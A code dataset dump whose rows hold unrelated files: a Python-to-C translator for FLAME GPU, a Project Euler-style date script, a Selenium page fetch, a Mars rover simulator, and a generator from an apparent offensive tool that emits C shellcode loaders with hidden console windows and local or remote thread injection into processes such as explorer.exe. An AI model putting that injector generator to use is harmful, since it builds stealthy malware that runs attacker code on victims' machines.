self.dispatch(t.iter.args[0])
self.write(";")
self.dispatch(t.target)
self.write("<")
self.dispatch(t.iter.args[1])
self.write(";")
self.dispatch(t.target)
self.write("++)")
elif len(t.iter.args) == 3:
self.fill(f"for (int ")
self.dispatch(t.target)
self.write("=")
self.dispatch(t.iter.args[0])
self.write(";")
self.dispatch(t.target)
self.write("<")
self.dispatch(t.iter.args[1])
self.write(";")
self.dispatch(t.target)
self.write("+=")
self.dispatch(t.iter.args[2])
self.write(")")
else:
self.RaiseError(t, "Range based for loops requires use of 'range' function with arguments and not keywords")
self.enter()
self.dispatch(t.body)
self.leave()
else:
self.RaiseError(t, "Range based for loops only support calls to the 'range' function")
# member function call can only be on message_in.func() type call.
elif isinstance(t.iter.func, ast.Attribute):
# must be an attribute (e.g. calling a member of message_in)
if t.iter.func.value.id == self._input_message_var:
self.dispatchMessageLoop(t)
else:
self.RaiseError(t, "Range based for loops only support calling members of message input variable")
else:
self.RaiseError(t, "Range based for loops only support message iteration or use of 'range'")
else:
self.RaiseError(t, "Range based for loops only support message iteration or use of 'range'")
def _AsyncFor(self, t):
self.RaiseError(t, "Async for not supported")
def _If(self, t):
"""
Fairly straightforward translation to if, else if, else format
"""
self.fill("if (")
self.dispatch(t.test)
self.write(")")
self.enter()
self.dispatch(t.body)
self.leave()
# collapse nested ifs into equivalent elifs.
while (t.orelse and len(t.orelse) == 1 and
isinstance(t.orelse[0], ast.If)):
t = t.orelse[0]
self.fill("else if (")
self.dispatch(t.test)
self.write(")")
self.enter()
self.dispatch(t.body)
self.leave()
# final else
if t.orelse:
self.fill("else")
self.enter()
self.dispatch(t.orelse)
self.leave()
def _While(self, t):
"""
Straightforward translation to c style while loop
"""
self.fill("while (")
self.dispatch(t.test)
self.write(")")
self.enter()
self.dispatch(t.body)
self.leave()
if t.orelse:
self.RaiseError(t, "While else not supported")
def _With(self, t):
self.RaiseError(t, "With not supported")
def _AsyncWith(self, t):
self.RaiseError(t, "Async with not supported")
# expr
def _Bytes(self, t):
self.RaiseError(t, "Byte strings and Bytes function not supported")
def _Str(self, tree):
# force writing in double quotes
self.write(f'"{tree.s}"')
def _JoinedStr(self, t):
self.RaiseError(t, "Joined strings not supported")
def _FormattedValue(self, t):
self.RaiseError(t, "Formatted strings not supported")
def _fstring_JoinedStr(self, t, write):
self.RaiseError(t, "F strings not supported")
def _fstring_Str(self, t, write):
self.RaiseError(t, "F strings not supported")
def _fstring_Constant(self, t, write):
self.RaiseError(t, "F strings not supported")
def _fstring_FormattedValue(self, t, write):
self.RaiseError(t, "F strings not supported")
def _Name(self, t):
"""
Everything ends up as a Name once it is an identifier
"""
self.write(t.id)
def _NameConstant(self, t):
# Required only for Python 3.7
if t.value == None:
self.write(0)
elif t.value:
self.write("true")
else:
self.write("false")
def _Repr(self, t):
self.RaiseError(t, "Repr not supported")
def _Constant(self, t):
"""
Restrict most types of constant except for numeric types and constant strings
Picks up some obvious conversions such as None and Bools
"""
value = t.value
if isinstance(value, tuple):
self.RaiseError(t, "Tuples not supported")
if isinstance(value, dict):
self.RaiseError(t, "Dictionaries not supported")
if isinstance(value, list):
self.RaiseError(t, "Lists not supported")
elif value is Ellipsis: # instead of `...` for Py2 compatibility
self.RaiseError(t, "Ellipsis not supported")
elif isinstance(value, str):
self.write(f'"{value}"')
elif isinstance(value, (bytes, bytearray)): # reject bytes strings e.g. b'123'
self.RaiseError(t, "Byte strings and Bytes function not supported")
elif isinstance(value, bool):
if value:
self.write("true")
else:
self.write("false")
elif value == None:
self.write(0)
else:
self.write(repr(value))
def _Num(self, t):
self.write(repr(t.n))
def _List(self, t):
self.RaiseError(t, "Lists not supported")
def _ListComp(self, t):
self.RaiseError(t, "List comprehension not supported")
def _GeneratorExp(self, t):
self.RaiseError(t, "Generator expressions not supported")
def _SetComp(self, t):
self.RaiseError(t, "Set comprehension not supported")
def _DictComp(self, t):
self.RaiseError(t, "Dictionary comprehension not supported")
def _comprehension(self, t):
self.RaiseError(t, "Comprehension not supported")
def _IfExp(self, t):
"""
Equivalent to a ternary operator
"""
self.dispatch(t.test)
self.write(" ? ")
self.dispatch(t.body)
self.write(" : ")
self.dispatch(t.orelse)
def _Set(self, t):
self.RaiseError(t, "Sets not supported")
def _Dict(self, t):
self.RaiseError(t, "Dictionaries not supported")
def _Tuple(self, t):
self.RaiseError(t, "Tuples not supported")
unop = {"Invert":"~", "Not": "!", "UAdd":"+", "USub":"-"}
def _UnaryOp(self, t):
"""
Translate to C equivalent opertaors
"""
self.write("(")
self.write(self.unop[t.op.__class__.__name__])
self.dispatch(t.operand)
self.write(")")
binop = { "Add":"+", "Sub":"-", "Mult":"*", "MatMult":"@", "Div":"/", "Mod":"%",
"LShift":"<<", "RShift":">>", "BitOr":"|", "BitXor":"^", "BitAnd":"&",
"FloorDiv":"//", "Pow": "**"}
def _BinOp(self, t):
"""
Python style pow and floordiv are not supported so translate to a function call.
No matrix mul support.
"""
op_name = t.op.__class__.__name__
# translate pow into function call (no float version)
if op_name == "Pow":
self.write("pow(")
self.dispatch(t.left)
self.write(", ")
self.dispatch(t.right)
self.write(")")
# translate floor div into function call (no float version)
elif op_name == "FloorDiv":
self.write("floor(")
self.dispatch(t.left)
self.write("/")
self.dispatch(t.right)
self.write(")")
elif op_name == "MatMult":
self.RaiseError(t, "Matrix multiplier operator not supported")
else:
self.write("(")
self.dispatch(t.left)
self.write(" " + self.binop[op_name] + " ")
self.dispatch(t.right)
self.write(")")
cmpops = {"Eq":"==", "NotEq":"!=", "Lt":"<", "LtE":"<=", "Gt":">", "GtE":">=",
"Is":"==", "IsNot":"!=", "In":"in", "NotIn":"not in"}
def _Compare(self, t):
self.dispatch(t.left)
for o, e in zip(t.ops, t.comparators):
# detect list ops
if o.__class__.__name__ == "In" or o.__class__.__name__ == "NotIn":
self.RaiseError(t, "In and NotIn operators not supported")
self.write(" " + self.cmpops[o.__class__.__name__] + " ")
self.dispatch(e)
boolops = {ast.And: '&&', ast.Or: '||'}
def _BoolOp(self, t):
"""
Translate to logical and/or operators in C
"""
self.write("(")
s = " %s " % self.boolops[t.op.__class__]
interleave(lambda: self.write(s), self.dispatch, t.values)
self.write(")")
def _Attribute(self,t):
"""
A very limited set of attributes are supported so these are fully evaluated here. Other places where attribute type expressions may occur will also evaluate them fully rather than recursively call this function.
Attributes supported are only;
* pyflamegpu.attribute - a supported attribute e.g. pyflamegpu.ALIVE. This will be translated into a namespace member.
* math.constant - Any supported math constants are translated to C definition versions
"""
# Only a limited set of globals supported
func_dict = None
# pyflamegpu singleton
if isinstance(t.value, ast.Name):
if t.value.id == "pyflamegpu":
if t.attr in self.fgpu_attrs:
# proceed
self.write("flamegpu::")
self.write(t.attr)
else:
self.RaiseError(t, f"Attribute '{t.attr}' does not exist in pyflamegpu object")
# math functions (try them in raw function call format) or constants
elif t.value.id == "math":
if t.attr in self.mathconsts:
self.write(self.mathconsts[t.attr])
else:
self.RaiseError(t, f"Unsupported math constant '{t.attr}'")
# numpy types
elif t.value.id == "numpy" or t.value.id == "np":
# not sure how a numpy attribute would be used without function call or type hint but translate anyway
if t.attr in self.numpytypes:
self.write(self.numpytypes[t.attr])
else:
self.RaiseError(t, f"Unsupported numpy type {t.attr}")
else:
self.RaiseError(t, f"Global '{t.value.id}' identifiers not supported")
else:
self.RaiseError(t, "Unsupported attribute")
def _CallArguments(self, t):
comma = False
for e in t.args:
if comma: self.write(", ")
else: comma = True
self.dispatch(e)
if len(t.keywords):
self.RaiseWarning(t, "Keyword argument not supported. Ignored.")
if sys.version_info[:2] < (3, 5):
if t.starargs:
self.RaiseWarning(t, "Starargs not supported. Ignored.")
if t.kwargs:
self.RaiseWarning(t, "Kwargs not supported. Ignored.")
def _Call(self, t):
"""
Some basic checks are undertaken on calls to ensure that the function being called is either a builtin or defined device function.
A special dispatcher is required
"""
# check calls but let attributes check in their own dispatcher
funcs = self._device_functions + self.pythonbuiltins + [self._input_message_var] # message_input variable is a valid function name as certain message types have arguments on iterator
if isinstance(t.func, ast.Name):
if (t.func.id not in funcs):
self.RaiseWarning(t, "Function call is not a defined FLAME GPU device function or a supported python built in.")
# dispatch even if warning raised
self.dispatch(t.func)
elif isinstance(t.func, ast.Lambda):
self.dispatch(t.func) # not supported
else:
# special handler for dispatching member function calls
# This would otherwise be an attribute
self.dispatchMemberFunction(t.func, t)
self.write("(")
self._CallArguments(t)
self.write(")")
def _Subscript(self, t):
"""
Arrays are not supported but subscript allows accessing array like variables which is required for macro environment properties (e.g. a[0][1][2])
Obvious limitation is no slicing type syntax (e.g. a[:2])
"""
self.dispatch(t.value)
self.write("[")
self.dispatch(t.slice)
self.write("]")
def _Starred(self, t):
self.RaiseError(t, "Starred values not supported")
# slice
def _Ellipsis(self, t):
self.RaiseError(t, "Ellipsis values not supported")
def _Index(self, t):
self.RaiseError(t, "Index values not supported")
def _Slice(self, t):
self.RaiseError(t, "Slicing values not supported")
def _ExtSlice(self, t):
self.RaiseError(t, "ExtSlice values not supported")
# argument
def _arg(self, t):
"""
Arguments should be processed by a custom dispatcher and it should not be possible to get here
"""
self.RaiseError(t, "Arguments should already have been processed")
# others
def _arguments(self, t):
"""
Arguments should be processed by a custom dispatcher and it should not be possible to get here
"""
self.RaiseError(t, "Arguments should already have been processed")
def _keyword(self, t):
self.RaiseError(t, "Keywords are not supported")
def _Lambda(self, t):
self.RaiseError(t, "Lambda is not supported")
def _alias(self, t):
self.RaiseError(t, "Aliasing is not supported")
def _withitem(self, t):
self.RaiseError(t, "With not supported")
|
2,996 | 7430e17d1c424362399cf09a0c3ecae825d04567 | import datetime
count = 0
for y in xrange(1901,2001):
for m in xrange(1,13):
if datetime.date(y,m,1).weekday() == 6:
count += 1
print count
|
2,997 | 03b2b722832eb46f3f81618f70fd0475f1f08c94 |
from selenium import webdriver
from time import sleep
from bs4 import BeautifulSoup
"""
With selenium we need web driver for our browser.
If you use google chrome, you can download chrome driver from here:
http://chromedriver.chromium.org/downloads
In linux (my OS) I extracted downloaded zip file and placed
exe file in "/home/UserName/bin"
I did this in order not to write chrome driver path everytime
"""
# IF you did not locate exe file in user/bin or user/local/bin
# then you have to specify the driver path while creating driver object
# driver object is browser which you can programatically control
driver = webdriver.Chrome('/Users/UserName/Downloads/chromedriver')
# open some page using get method
driver.get('https://www.facebook.com')
# driver.page_source
# Opens facebook's source html file
soup = BeautifulSoup(driver.page_source,'lxml')
print(soup.prettify())
# close webdriver object
driver.close()
|
2,998 | 1f49d2341f0bcc712baede28f41c208a01b92e6d | class Rover(object):
DIRECTIONS = 'NESW'
MOVEMENTS = {
'N': (0, 1),
'E': (1, 0),
'S': (0, -1),
'W': (-1, 0)
}
def __init__(self, init_string, plateau_dimensions):
'''
give the rover a sense of the plateau it's on
'''
max_x, max_y = plateau_dimensions
self.max_x = int(max_x)
self.max_y = int(max_y)
'''
x = current x coordinate
y = current y coordinate
o = current orientation
'''
x, y, o = init_string.split(' ')
self.x = min(self.max_x, int(x))
self.y = min(self.max_y, int(y))
self.o = o
self.obstacles = {}
self.commands = ''
def __repr__(self):
return "<Rover x=%d, y=%d, o=%s>" % (self.x, self.y, self.o)
def get_position(self):
return self.x, self.y
def set_obstacles(self, locations):
for x, y in locations:
d = self.obstacles.setdefault(x, {})
d.setdefault(y, 'ROVER') # could be any value
def is_location_free(self, x, y):
column = self.obstacles.get(x)
if not column:
''' nothing in this column '''
return True
else:
row = column.get(y)
if not row:
return True
return False
def _rotate(self, direction):
i = self.DIRECTIONS.index(self.o)
i = i + direction
if i == len(self.DIRECTIONS):
self.o = self.DIRECTIONS[0]
elif i < 0:
self.o = self.DIRECTIONS[-1]
else:
self.o = self.DIRECTIONS[i]
def rotate_right(self):
self._rotate(1)
def rotate_left(self):
self._rotate(-1)
def move(self):
x, y = self.MOVEMENTS.get(self.o)
new_x = self.x + x
new_y = self.y + y
if (not 0 <= new_x <= self.max_x) or (not 0 <= new_y <= self.max_y):
''' ignore, out of bounds '''
pass
elif not self.is_location_free(new_x, new_y):
''' there is a rover in my way! '''
pass
else:
self.x += x
self.y += y
def set_commands(self, command_string):
self.commands = command_string
def execute(self):
for c in self.commands:
if c == 'L':
self.rotate_left()
elif c == 'R':
self.rotate_right()
elif c == 'M':
self.move()
else:
print 'unknown command: %s' % c
return "%d %d %s" % (self.x, self.y, self.o)
class ControlCenter(object):
def __init__(self):
self.input = ''
self.rovers = []
def set_input(self, text):
''' take the input, split by newline and discard empty lines '''
self.input = [line for line in text.split('\n') if line]
def clear_rovers(self):
self.rovers = []
def initialize_rover(self, initial_position, plateau_dimensions):
rover = Rover(initial_position, plateau_dimensions)
'''
Initialize a rover and add it to a list of rovers for reference.
'''
self.rovers.append(rover)
return rover
def run(self):
rover_states = []
''' First setup the rovers, and collect the control statements '''
for i, line in enumerate(self.input):
line = line.upper()
if i == 0:
plateau_dimensions = line.split(" ")
elif (i % 2) == 1:
rover = self.initialize_rover(line, plateau_dimensions)
else:
rover.set_commands(line)
'''
Now that we have all the rovers initialized, we can pass their current
positions to the one that's going to move in order to avoid collisions.
'''
for i, rover in enumerate(self.rovers):
obstacles = [r.get_position()
for r in self.rovers[:i] + self.rovers[i + 1:]]
rover.set_obstacles(obstacles)
state = rover.execute()
rover_states.append(state)
return "\n\n".join(rover_states)
if __name__ == "__main__":
from test_cases import tests
success = 0
cc = ControlCenter()
for i, (test_input, test_output) in enumerate(tests, start=1):
cc.clear_rovers()
cc.set_input(test_input)
if cc.run() == test_output:
success += 1
print '%d tests out of %d passed' % (success, i)
|
2,999 | e9b9f87a18a5788ac86b1e85c0f3d7858946e03a | from lib import gen, core
Shellcode = gen.Varname_Creator()
Hide_Window = gen.Varname_Creator()
def Start():
Start_Code = "#include <windows.h>\n"
Start_Code += "#include <tlhelp32.h>\n"
Start_Code += "#include <stdio.h>\n"
Start_Code += "#include <stdlib.h>\n"
Start_Code += "#include <string.h>\n"
Start_Code += "int main(int argc, char **argv) {"
Start_Code += "char " + Shellcode + "[] = {"
return Start_Code
def Hide_Window_Console():
Hide_Window_Console_Code = "};\nHWND " + Hide_Window + " = GetConsoleWindow();"
Hide_Window_Console_Code += "ShowWindow(" + Hide_Window + ", SW_HIDE);"
return Hide_Window_Console_Code
def Local_Or_Remote():
print("""
|---------------------------------------|
| [1] Local Thread Injection (DEFAULT); |
| [2] Remote Thread Injection; |
|---------------------------------------|
""")
Choice = core.core_input()
if Choice == "1":
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
elif Choice == "2":
print("""
|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
""")
ProcessName = core.core_input()
if ProcessName != "":
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = "explorer.exe"
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = "void *" + Exec + " = VirtualAlloc(0, sizeof " + Shellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);"
Local_Thread_Injection += "memcpy(" + Exec + ", " + Shellcode + ", sizeof " + Shellcode + ");"
Local_Thread_Injection += "((void(*)())" + Exec + ")();}"
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = "PROCESSENTRY32 " + Entry + ";"
Remote_Thread_Injection += Entry + ".dwSize = sizeof(PROCESSENTRY32);"
Remote_Thread_Injection += "HANDLE " + Snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);"
Remote_Thread_Injection += "if (Process32First(" + Snapshot + ", &" + Entry + ") == TRUE){"
Remote_Thread_Injection += "while (Process32Next(" + Snapshot + ", &" + Entry + ") == TRUE){"
Remote_Thread_Injection += 'if (stricmp(' + Entry + '.szExeFile, ' + '"' + ProcessName + '"' + ') == 0){'
Remote_Thread_Injection += "HANDLE " + Process_Handle + ";"
Remote_Thread_Injection += "HANDLE " + Remote_Thread + ";"
Remote_Thread_Injection += "PVOID " + Remote_Buffer + ";"
Remote_Thread_Injection += Process_Handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Entry + ".th32ProcessID);"
Remote_Thread_Injection += Remote_Buffer + " = VirtualAllocEx(" + Process_Handle + ", NULL, sizeof " + Shellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);"
Remote_Thread_Injection += "WriteProcessMemory(" + Process_Handle + ", " + Remote_Buffer + ", " + Shellcode + ", sizeof " + Shellcode + ", NULL);"
Remote_Thread_Injection += Remote_Thread + " = CreateRemoteThread(" + Process_Handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + Remote_Buffer + ", NULL, 0, NULL);"
Remote_Thread_Injection += "CloseHandle(" + Process_Handle + ");}}}"
Remote_Thread_Injection += "CloseHandle(" + Snapshot + ");}"
return Remote_Thread_Injection |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.